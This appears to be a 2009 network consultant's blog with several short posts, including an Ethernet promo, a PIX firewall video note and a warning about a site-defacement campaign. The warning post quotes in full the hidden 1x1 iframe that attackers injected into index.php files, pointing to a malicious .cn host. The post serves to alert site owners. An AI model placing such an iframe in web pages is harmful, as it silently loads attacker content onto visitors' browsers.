How Ethernet Is Taking Over The World…

By Eric · Thursday, July 23rd, 2009 · No Comments »

A quick message today to let you know about a new video on the blog.

Check it out here >>

Long story short:

All T1, DS3 and OC connections will be shut down in 2010 so you
will need to replace them with Ethernet IMMEDIATELY!

This is part of the new Internet 4.0 mandate to do away with all Legacy
connectivity methods.

Just kidding… :)

But we have been doing a lot of new Ethernet implementations for both WAN
and Internet Access and have a nice promo going on right now.

Figured I’d let you know about it since you might be able to benefit from it…

Check out the video >>

http://x-betstarwager-x.cn/in.cgi?cocacola87 - iframe wreaking havoc

By Eric · Friday, March 6th, 2009 · 2 Comments »

A new hack/virus/trojan/mallware/whatever is hitting sites across the net quickly.

Not sure what it exactly does, and don’t really care. :) All I know is it is a PITA (pain in the a..)

Basically what appears to be happening is the hack is gaining access via FTP to the root directory of web servers and modifying the index.php file to include the following iframe:

iframe src=”http://x-betstarwager-x.cn/in.cgi?cocacola87″ width=1 height=1 style=”visibility: hidden”/iframe

Feel free to post a response if you know anything more about this. My knowledge is limited on it, but know it’s hitting a lot of sites and just started in the very recent past.

In the meantime, if you have FTP access to your own web sites I would recommend a thorough scan of your own PC because it is possible the trojan is gaining access through your connection.

PIX Firewall Video

By Eric · Friday, January 2nd, 2009 · No Comments »

This was an old video I quickly put together about a year ago on setting up the PIX to allow RDP through the internet.

The sound quality is pretty bad and it seems a lot blurrier (is that a word?) than it was when I first uploaded it to YouTube. I wonder if they changed their settings or something in the past year.

Anyway, it’s amazing… 1 Year and 13,000 views later, I have received more personal comments from people on how helpful this video was to them. Always great to hear you helped someone else out…

My new ASA videos which are available in Key Masterminds are way more thorough than this and basically blow this out of the water. Much more time and effort has gone into the new videos…

Bad economy is great for consulting

By Eric · Friday, January 2nd, 2009 · 1 Comment »

I have found that during the so-called “economic woes” that things are better than ever in my world.

Perhaps it is due to the fact that companies are downsizing, perhaps letting go of their on staff employees, but the day to day networking and security needs are still there.

In fact, I would say those needs are greater than ever!

Why?

Because the tech-heads who got laid off now have more time on their hands…

And tech-heads who are into hacking with time on their hands, equals what? Yep, you guessed it, more debauchery!

But that is good for us IT Network and Security consultants!

So, as my good friends in Australia say, “No worries, mate!”
